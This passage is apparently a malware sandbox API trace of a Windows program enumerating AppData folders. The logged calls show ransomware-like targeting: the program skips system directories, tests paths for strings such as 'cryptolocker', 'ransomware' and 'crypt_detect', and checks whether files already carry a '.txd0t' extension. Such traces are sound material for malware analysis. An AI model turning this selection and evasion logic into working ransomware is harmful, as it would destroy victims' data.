StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\PeerDistRepub" [0090.019] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0090.019] StrCmpW (psz1="Publishers", psz2=".") returned 1 [0090.019] StrCmpW (psz1="Publishers", psz2="..") returned 1 [0090.019] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.019] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.019] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Publishers", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" [0090.019] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\windows\\system32\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\windows\\system\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Publishers" [0090.020] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0x501e95f1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resmon.ResmonCfg.txd0t", cAlternateFileName="RESMON~1.TXD")) returned 1 [0090.020] StrCmpW (psz1="Resmon.ResmonCfg.txd0t", psz2=".") returned 1 [0090.020] StrCmpW (psz1="Resmon.ResmonCfg.txd0t", psz2="..") returned 1 [0090.020] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.020] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.020] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Resmon.ResmonCfg.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg.txd0t" [0090.020] PathFindExtensionW (pszPath="Resmon.ResmonCfg.txd0t") returned=".txd0t" [0090.020] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.020] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3e62068a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x3e62068a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0090.020] StrCmpW (psz1="Temp", psz2=".") returned 1 [0090.020] StrCmpW (psz1="Temp", psz2="..") returned 1 [0090.020] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.020] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.020] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Temp", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Temp" [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\system32\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\system\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.020] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Temp", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Temp" [0090.020] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0090.020] StrCmpW (psz1="Temporary Internet Files", psz2=".") returned 1 [0090.020] StrCmpW (psz1="Temporary Internet Files", psz2="..") returned 1 [0090.020] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cdbf8a7, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd2fbd0ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3cdbf8a7, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0090.020] StrCmpW (psz1="TileDataLayer", psz2=".") returned 1 [0090.020] StrCmpW (psz1="TileDataLayer", psz2="..") returned 1 [0090.020] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.020] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.021] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="TileDataLayer", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer") returned="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer" [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\system32\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\system\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\TileDataLayer", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\TileDataLayer" [0090.021] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf56c97e4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xd3023f2d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf56c97e4, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UNP", cAlternateFileName="")) returned 1 [0090.021] StrCmpW (psz1="UNP", psz2=".") returned 1 [0090.021] StrCmpW (psz1="UNP", psz2="..") returned 1 [0090.021] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.021] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.021] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="UNP", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\UNP") returned="C:\\Users\\FD1HVy\\AppData\\Local\\UNP" [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\system32\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\system\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\UNP", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\UNP" [0090.021] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0090.021] StrCmpW (psz1="VirtualStore", psz2=".") returned 1 [0090.021] StrCmpW (psz1="VirtualStore", psz2="..") returned 1 [0090.021] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0090.021] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0090.021] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="VirtualStore", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore") returned="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore" [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\system32\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\system\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.021] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\VirtualStore", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\VirtualStore" [0090.021] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0090.022] FindClose (in: hFindFile=0xec2070 | out: hFindFile=0xec2070) returned 1 [0090.022] GetProcessHeap () returned 0xe30000 [0090.022] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a58 | out: hHeap=0xe30000) returned 1 [0090.022] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0090.022] StrCmpW (psz1="LocalLow", psz2=".") returned 1 [0090.022] StrCmpW (psz1="LocalLow", psz2="..") returned 1 [0090.022] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\AppData", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData") returned="C:\\Users\\FD1HVy\\AppData" [0090.022] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\" [0090.022] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\", psz2="LocalLow", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\system32\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\system\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\local\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\boot\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\perflogs\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\programdata\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\drivers\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\wsus\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="crypt_detect") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="cryptolocker") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="ransomware") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\WINDOWS") returned 0x0 [0090.022] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.023] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow", lpSrch="C:\\Program Files") returned 0x0 [0090.023] GetProcessHeap () returned 0xe30000 [0090.023] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4c2) returned 0xec7a58 [0090.023] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0090.023] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\*", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*" [0090.023] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0090.023] StrCmpW (psz1=".", psz2=".") returned 0 [0090.023] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.023] StrCmpW (psz1="..", psz2=".") returned 1 [0090.023] StrCmpW (psz1="..", psz2="..") returned 0 [0090.023] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7157dbce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0090.023] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0090.023] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0090.023] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0090.023] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0090.023] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Adobe", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe" [0090.023] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0090.023] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.023] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0090.023] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.023] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.023] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\local\\") returned 0x0 [0090.023] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Adobe" [0090.023] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xdfedb1f6, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x63cde605, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x63cde605, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0090.023] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0090.023] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0090.023] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfdd2edaa, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xaf813748, ftLastAccessTime.dwHighDateTime=0x1d5d80b, ftLastWriteTime.dwLowDateTime=0xaf813748, ftLastWriteTime.dwHighDateTime=0x1d5d80b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0090.024] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0090.024] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0090.024] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow" [0090.024] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow", psz2="\\", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\" [0090.024] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\", psz2="Mozilla", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla" [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\system32\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\system\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\local\\") returned 0x0 [0090.024] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Mozilla", lpSrch="\\appdata\\locallow\\") returned="\\AppData\\LocalLow\\Mozilla" [0090.024] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb07402a4, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb07402a4, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb07402a4, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0090.024] StrCmpW (psz1="Sun", psz2=".") returned 1 [0090.024] StrCmpW (psz1="Sun", psz2="..") returned 1 [0090.024] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\AppData\\LocalLow", cchMax=1090 | out: psz1="C:\\Users\\FD1HVy\\AppData\\LocalLow") 